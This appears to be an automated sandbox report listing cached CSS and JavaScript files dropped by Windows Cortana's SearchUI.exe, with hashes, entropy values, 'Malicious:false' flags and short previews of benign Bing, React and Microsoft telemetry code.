                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\JYoPtIKNhSsYx2yWTQ7wI2BbEs0[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):78428
                                                            Entropy (8bit):5.207062449369692
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0F2E1FF4FF81897D2B8968E9DB364C4F
                                                            SHA1:B51C7452A54337FD0B34027191A71601865C8F30
                                                            SHA-256:98A24DB270D4652C4F1D3BA59C1F527ED8EF1E43B51389DCE13D63E011F42049
                                                            SHA-512:2003138D3774FED208A8878DA24564A05798887A1164F314655A040F1A61D934BF4D6BF4E7B1A140398FFCDDE8679D9E90139A4D2C98FD9856E04865179B3F8C
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\JYoPtIKNhSsYx2yWTQ7wI2BbEs0[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):6
                                                            Entropy (8bit):2.584962500721156
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:77373397A17BD1987DFCA2E68D022ECF
                                                            SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
                                                            SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                                                            SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                                                            Malicious:false
                                                            Preview: z{a:1}
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\QNBBNqWD9F_Blep-UqQSqnMp-FI[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\YFRiFdAq8JMFRbEqynlPcrVqvb4[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1515
                                                            Entropy (8bit):5.095845525337584
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:08E47D1329ABE9AEAD433A8B2C4104B9
                                                            SHA1:2A346278752888ED07A4E25CBD84B446BD6000DB
                                                            SHA-256:D0373F0C4B0A4A7B1400C7388B3E37FDB96C2802BA9E98A9880F16094038DFBE
                                                            SHA-512:51EF2C1093851C6B387EFF7FB2B28C07974BD80821C1F64555F168ADAD248DFC076699A21C8352A6A030091BA15174E1C175B66CFF6FE2B287AA20DBC295CC96
                                                            Malicious:false
                                                            Preview: z{a:1}.b_scopebar{background-color:#eee}.b_scopebar,.b_scopebar a,.b_scopebar a:visited,#b_header .b_symb{color:#767676}.b_scopebar li.b_active a,.b_scopebar li.b_active a:visited,.b_scopebar span{border-color:#f84e29;color:#000}.b_scopebar a,.b_scopebar span{text-decoration:none;text-transform:uppercase}.b_scopebar a{text-transform:capitalize}#b_header:not(:empty){border-bottom:1px solid #ccc;position:fixed;top:0;width:100%;z-index:1000}#b_header .b_symb{float:left}body[dir] #b_header .b_symb{margin:10px 10px 0 10px}body[dir='rtl'] #b_header .b_symb{float:right}.b_scopebar li{display:inline-flex}body[dir] .b_scopebar li{margin:0 10px}.b_scopebar li:last-child{flex:none}body[dir='ltr'] .b_scopebar li:last-child{margin-right:12px}body[dir='rtl'] .b_scopebar li:last-child{margin-left:12px}body[dir='ltr'] .b_scopebar li:first-child{margin-left:12px}body[dir='rtl'] .b_scopebar li:first-child{margin-right:12px}.b_scopebar ul{overflow-x:auto;white-space:nowrap;-ms-overflow-style:none}body[di
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\YFRiFdAq8JMFRbEqynlPcrVqvb4[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):20407
                                                            Entropy (8bit):5.305440084477046
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DBA3A107C2F712A09965545FB5C09FAF
                                                            SHA1:381751A93F9C12887AC67E50BDDF748D7AB99206
                                                            SHA-256:9E0E1DFB8EA8D029C69BCAD4CEDC7D8981FAF9E2C915616FB740F2EEFDCD30EE
                                                            SHA-512:B1FA5EB1AF33900488910DCAB2FD450A88810C50CF1C9DFF2ADFE5A514F9449B4D06A667FD010347B6D0B88B88EB7765A929D893E5ADE8F83AE3FD4FE1EB1F3A
                                                            Malicious:false
                                                            Preview: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:"."}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;color:#000;content:"."}.sw_playa:after,.sw_playd:after{color:#767676}.sw_playp:after{content:"."}.sw_plus:after,.sw_up:after,.sw_down:after{font-size:12px}.sw_down:after{content:"."}.sw_up:after{content:"."}.sw_st,.sw_sth,.sw_ste{line-height:12px}body[dir='ltr'] .sw_st,body[dir='ltr'] .sw_sth,body[dir='ltr'] .sw_ste{padding-right:1px}body[dir='rtl'] .sw_st,body[dir='rtl'] .sw_sth,body[dir='rtl'] .sw_ste{padding-left:1px}.sw_st:after,.sw_sth:before,.sw_sth:after,.sw_ste:after{font-size:12px;display:inline-block;color:#000}.sw_st:after{content:"."}.sw_sth{white-space:nowrap}.sw_sth:before{content:"."}body[dir='ltr'] .sw_sth:before{margin-right:-12px}body[dir='rtl'] .sw_sth:before{margin-left:-12px}.sw_sth:after{content:".";co
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\h2K-JrpzUGDQHdN-yC7uggav5Es[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\nEl6gm6izUrrDobE23TevZhe_fI[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):66986
                                                            Entropy (8bit):6.002532652367151
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4D3E595F2CBC3A17F1AF84725C46E751
                                                            SHA1:0825FFDBABA1A76BD3291A01E0BC37DC0287FCA5
                                                            SHA-256:3CBDCF1C0B5C56F239D334AA89251B0D0398E4C36F0490435097E02CF5BC7EB9
                                                            SHA-512:93B570A293843B3ABEAB8C8CC73B3B9F8B66B68E5A31F28854A6F0EDE70D1F7FE3E1821D484420F694AF280EEB7EE7B84C24DAAFE1F1FEEBA503D238204CBB51
                                                            Malicious:false
                                                            Preview: @font-face{font-family:"Cortana MDL2 Assets";src:url(data:application/font-woff;base64,
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\nEl6gm6izUrrDobE23TevZhe_fI[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\4yU6o9nzuSe0YbPN7SClkKqmF_A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\98-tFzBbrLP3oaKdmZtyZ4BBBI4.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\BQR--Mi6Hdug9aUgfjMzORag63E.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):15771
                                                            Entropy (8bit):5.09526529579509
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E515E69B21C49A355D5D4B91764ABE00
                                                            SHA1:7571F85095E21BA061631D8A38D18623BCABF301
                                                            SHA-256:365F8B7A23865CA36D1C1F7A25553AFDDB6223FF524B56D4BEB80FDD98C8E057
                                                            SHA-512:AA38791CE4ED4039A6D63CF6273BE8CA0DDE2436B8C6E0451937A85652D1C6EA22F38DA9FD81BA9A4E877861B507603C88CACBBFFE4E6B30EC602396F2B87A81
                                                            Malicious:false
                                                            Preview: var WSB;(function(n){n.TopLevelDomains={aaa:1,aarp:1,abarth:1,abb:1,abbott:1,abbvie:1,abc:1,able:1,abogado:1,abudhabi:1,ac:1,academy:1,accenture:1,accountant:1,accountants:1,aco:1,actor:1,ad:1,adac:1,ads:1,adult:1,ae:1,aeg:1,aero:1,aetna:1,af:1,afamilycompany:1,afl:1,africa:1,ag:1,agakhan:1,agency:1,ai:1,aig:1,aigo:1,airbus:1,airforce:1,airtel:1,akdn:1,al:1,alfaromeo:1,alibaba:1,alipay:1,allfinanz:1,allstate:1,ally:1,alsace:1,alstom:1,am:1,amazon:1,americanexpress:1,americanfamily:1,amex:1,amfam:1,amica:1,amsterdam:1,analytics:1,android:1,anquan:1,anz:1,ao:1,aol:1,apartments:1,app:1,apple:1,aq:1,aquarelle:1,ar:1,arab:1,aramco:1,archi:1,army:1,arpa:1,art:1,arte:1,as:1,asda:1,asia:1,associates:1,at:1,athleta:1,attorney:1,au:1,auction:1,audi:1,audible:1,audio:1,auspost:1,author:1,auto:1,autos:1,avianca:1,aw:1,aws:1,ax:1,axa:1,az:1,azure:1,ba:1,baby:1,baidu:1,banamex:1,bananarepublic:1,band:1,bank:1,bar:1,barcelona:1,barclaycard:1,barclays:1,barefoot:1,bargains:1,baseball:1,basketball:1,ba
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\BQR--Mi6Hdug9aUgfjMzORag63E.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\E1FvzbKmaRHmOqEzJ-mHoTOD7Ms.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):264216
                                                            Entropy (8bit):5.3845135313982135
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A5CB13FFEE7CCAB7B9CD5B04275945D5
                                                            SHA1:14E920AB62321C6DED7CB09C6B460F615338227C
                                                            SHA-256:F3CE50106C937DFE030F1FC6F4A516CC14CF3A1001797DC37F15B5E6C39AF3C7
                                                            SHA-512:6C1AB1FA411B4E5CAD365F31AFFA788EC28FAD351692DC8B0DD410980CB77C1639733E5449B14A1E5ACC78CA7CF0008D3864CD93CADF7B65E45CB6E825A6A54F
                                                            Malicious:false
                                                            Preview: var __spreadArrays,WSB;(function(n){function t(){if(SearchAppWrapper.CortanaApp.hostingEnvironment==4)return 7;if(!n.isMiniSerpEnabled())return 0;var t=7;return n.config.allowAnswersToAutoOpenMiniSerp||(t&=-2),n.config.allowDNavToAutoOpenMiniSerp||(t&=-3),n.config.allowWebToAutoOpenMiniSerp||(t&=-5),t}var i=["::{679F85CB-0220-4080-B29B-5540CC05AAB6}","::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"],r=function(){function r(){this.refreshEntrypointApp()}return r.prototype.refreshEntrypointApp=function(){this.EntryPointApp=SearchAppWrapper.CortanaApp.hostingEnvironment==3?1:n.config.forceSettingsAppExperience?3:SearchAppWrapper.CortanaApp.hostingEnvironment==5||n.config.forceSantoriniExperience?4:SearchAppWrapper.CortanaApp.hostingEnvironment==4?2:0},r.prototype.clearDefaults=function(){this.QfMode=0;this.PreviewPaneAvailable=!1;this.MiniSERPMode=0;this.AlwaysWide=!1;this.SearchBoxOnTop=!0;this.AllowKeyboardNavCycling=!0;this.AllowKeyboardNavOffCanvas=!1;this.ScopesAvailable=!1;this.FlatListWi
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):6584
                                                            Entropy (8bit):5.431678053520003
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BD7AE7C3176D8081B60F1107A59E2E0A
                                                            SHA1:0DA7BD177B96AF58FDE9C890671BD488C2E2436D
                                                            SHA-256:69A4F680A4A443E28D84769ABBBCDC1A64F24117E2B477B49DF0E6CFD5A83FCC
                                                            SHA-512:0145288AB1C74C45790C7ABCA7B0AA6A0E8C09AB05FC5B9A0AB858BE1B6E302F043EE5DA81C57158BE48A1700D63E9567C8D5DD56ED021508622F81A1D99D168
                                                            Malicious:false
                                                            Preview: /** @license React v16.1.1.. * react.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */..'use strict';(function(p,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l():"function"===typeof define&&define.amd?define(l):p.React=l()})(this,function(){function p(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,e=0;e<b;e++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[e+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function l(a){return function(){return a}}function n(a,b,c){this.props=a;this.context=b;this.refs=v;this.updater=c||w}function x(a,b,c){this.props=a;this.context=b;this.refs=
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):17560
                                                            Entropy (8bit):5.4266165365013235
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C8BE2C675D49A0D03AB4965A3AD5E9EF
                                                            SHA1:500ADA3E4B4A975D296D2049D53BBE7095F6FA77
                                                            SHA-256:DEBEDE07EF020FEFCA20294F5C16FA8D5FCDEC4DE0355BCA446F3B93D219B687
                                                            SHA-512:F7BBC3C6C35554193A292BA32E52E740F35D286E63C0805E5C8BCEDA84399D3D7081531CFF407D31B050DBB454571E0A3752A18863E311B18841209F30986517
                                                            Malicious:false
                                                            Preview: !function(t,e){if("object"==typeof exports&&"object"==typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var n=e();for(var i in n)("object"==typeof exports?exports:t)[i]=n[i]}}(this,function(){return function(t){function e(i){if(n[i])return n[i].exports;var r=n[i]={exports:{},id:i,loaded:!1};return t[i].call(r.exports,r,r.exports,e),r.loaded=!0,r.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(1)},function(t,e,n){"use strict";var i=n(2);e.AWTPiiKind=i.AWTPiiKind;var r=n(3);e.AWT=r["default"],e.AWT_COLLECTOR_URL_UNITED_STATES="https://us.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_GERMANY="https://de.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_JAPAN="https://jp.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_AUSTRALIA="https://au.pipe.aria.microsoft.com/Collector/3.0/",e.AWT_COLLECTOR_URL_EUROPE="https://eu.pipe.aria.microsoft.com/Collector/3.0/"},function(t,e){"use st
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\ZkAG-UZl4xeENnu1psdKTgHhS2A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):105833
                                                            Entropy (8bit):6.295832767856879
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:22D901D8F53738D0CE2222A0EB501D76
                                                            SHA1:DCB625EA214355F9C9378C3F9F8C8728B1B920CF
                                                            SHA-256:FBE180EA11D232E79FA2F3A996095CE05ABAD63A9423A73B24708225E8A3D818
                                                            SHA-512:FC02AFD728CB9E6A1FD4A91828C6689E288B0B7A513B5402F429EF3E4FE778796FFFCF7C2ED97F847DF44AB26D144EED3DDA0B8DBCF0A2971FB9EBAF9470A929
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\G0NZ14BJ\jhP1uapRf8Z8Qb959t11DNTsvB8.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):94820
                                                            Entropy (8bit):5.395085534401416
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:95029A2B8ED04C57F44599682E9CE9C6
                                                            SHA1:1E4A4BBEC5E408C925BB30FEFA2F7F1E5F6FEBBA
                                                            SHA-256:15EDF8C630F285A9B9D9033D867F4FB1D5288AD3BE707F31FB3BF7EDFA54EAEA
                                                            SHA-512:3C1F3EAA0E2D26D8CF854714E4BA4AF36B102D7AA8CE4138734406BABCD54DC3002EE31A3540009EA7E2C8C8DC3C8CB2CE6E753F410E6C3A0EF055A1E362A608
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\KQ0CP17M\-cZsBti431DEnyexEqRgH_6Vh3E.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):57418
                                                            Entropy (8bit):5.115734627931113
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B8C9A25AC5C5CFFDBC7721E7A33573CF
                                                            SHA1:D830E8814D866781CE338B8218B87B1066AF3E06
                                                            SHA-256:AB0B50651ABD4CF85042498827D99C42508A4E73F742F5EF52D571A15B3658B6
                                                            SHA-512:21F4B9AF5DB0329E2063C8BFA60DF4B15237E760C9A56FFA8D3556AA021BB463AE5561B0E61CDC412907D4BDE301E4BDCA93ED397CED339941649B6A493C165F
                                                            Malicious:false
                                                            Preview:
